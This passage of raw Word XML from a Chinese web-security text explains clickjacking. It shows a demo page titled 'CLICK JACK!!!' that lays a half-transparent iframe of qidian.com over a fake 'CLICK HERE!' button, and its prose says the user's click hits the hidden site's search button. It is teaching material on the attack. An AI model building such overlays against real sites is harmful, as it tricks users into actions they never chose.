                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;title&gt;CLICK JACK!!!&lt;/title&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="20"/>
                    <w:ind w:left="868" w:right="6566" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;style&gt; iframe {</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="266" w:lineRule="auto" w:before="0"/>
                    <w:ind w:left="1288" w:right="5570" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>width: 900px; height: 250px;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:before="5"/>
                    <w:rPr>
                      <w:sz w:val="15"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="266" w:lineRule="auto" w:before="0"/>
                    <w:ind w:left="1147" w:right="142" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>/* Use absolute positioning to line up update button with fake button */ position: absolute;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="266" w:lineRule="auto" w:before="0"/>
                    <w:ind w:left="1288" w:right="5683" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>top: -195px; left: -740px; z-index: 2;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:before="2"/>
                    <w:rPr>
                      <w:sz w:val="15"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="0"/>
                    <w:ind w:left="1147" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>/* Hide from view */</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="21"/>
                    <w:ind w:left="168" w:right="4364" w:firstLine="0"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>-moz-opacity: 0.5;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="1288" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>opacity: 0.5;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="1288" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>filter: alpha(opacity=0.5);</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="20"/>
                    <w:ind w:left="868" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:w w:val="100"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>}</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:before="12"/>
                    <w:rPr>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="0"/>
                    <w:ind w:left="868" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>button {</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="20"/>
                    <w:ind w:left="1288" w:right="5090" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>position: absolute; top: 10px;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="266" w:lineRule="auto" w:before="0"/>
                    <w:ind w:left="1288" w:right="5875" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>left: 10px; z-index: 1;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="180" w:lineRule="exact" w:before="0"/>
                    <w:ind w:left="1288" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>width: 120px;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="868" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:w w:val="100"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>}</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="20"/>
                    <w:ind w:left="868" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;/style&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="448" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;/head&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="448" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;body&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="21"/>
                    <w:ind w:left="868" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;iframe </w:t>
                  </w:r>
                  <w:hyperlink r:id="rId35">
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Courier New"/>
                        <w:sz w:val="16"/>
                      </w:rPr>
                      <w:t>src="http://www.qidian.com" </w:t>
                    </w:r>
                  </w:hyperlink>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>scrolling="no"&gt;&lt;/iframe&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="868" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;button&gt;CLICK HERE!&lt;/button&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="448" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;/body&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="20"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;/html&gt;</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="5"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="78"/>
        <w:ind w:left="623"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>在这个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>test.html </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>中有一个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>button</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>，如果 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iframe </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>完全透明时，那么用户看到的是：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="0" simplePos="0" relativeHeight="3208">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2186717</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>134930</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1178724" cy="198882"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="15" name="image10.png" descr=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="16" name="image10.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1178724" cy="198882"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="166"/>
        <w:ind w:left="0" w:right="20" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>用户看到的按钮</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>当 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iframe </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>半透明时，可以看到，在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>button </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>上面其实覆盖了另一个网页：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="0" simplePos="0" relativeHeight="3232">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2014727</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>118168</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1438487" cy="242030"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="17" name="image11.png" descr=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="18" name="image11.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1438487" cy="242030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="175"/>
        <w:ind w:left="0" w:right="22" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>实际的页面，按钮上隐藏了一个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>iframe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>窗口</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>覆盖的网页其实是一个搜索按钮：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="0" simplePos="0" relativeHeight="3256">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1549908</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>120110</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2433586" cy="585216"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="19" name="image12.png" descr=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="20" name="image12.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2433586" cy="585216"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="165"/>
        <w:ind w:left="0" w:right="22" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>隐藏的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>iframe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>窗口的内容</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>当用户试图点击 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>test.html </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>里的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>button </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>时，实际上却会点击到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iframe </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>页面中的搜索按钮。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:sectPr>
          <w:headerReference w:type="even" r:id="rId33"/>
          <w:headerReference w:type="default" r:id="rId34"/>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
          <w:pgNumType w:start="126"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="153"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:bookmarkStart w:name="5.2  Flash点击劫持" w:id="59"/>
      <w:bookmarkEnd w:id="59"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>分析其代码，起到关键作用的是下面这几行：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:8.010957pt;width:411.15pt;height:150pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:3280;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="8"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>iframe {</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="18"/>
                    <w:ind w:left="448" w:right="6410" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>width: 900px; height: 250px;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:before="9"/>
                    <w:rPr>
                      <w:sz w:val="15"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="0"/>
                    <w:ind w:left="266" w:right="1023" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>/* Use absolute positioning to line up update button with fake button */ position: absolute;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="2"/>
                    <w:ind w:left="448" w:right="6523" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>top: -195px; left: -740px; z-index: 2;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:before="9"/>
                    <w:rPr>
                      <w:sz w:val="15"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="0"/>
                    <w:ind w:left="266" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>/* Hide from view */</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="266" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>-moz-opacity: 0.5;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="20"/>
                    <w:ind w:left="448" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>opacity: 0.5;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="448" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>filter: alpha(opacity=0.5);</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
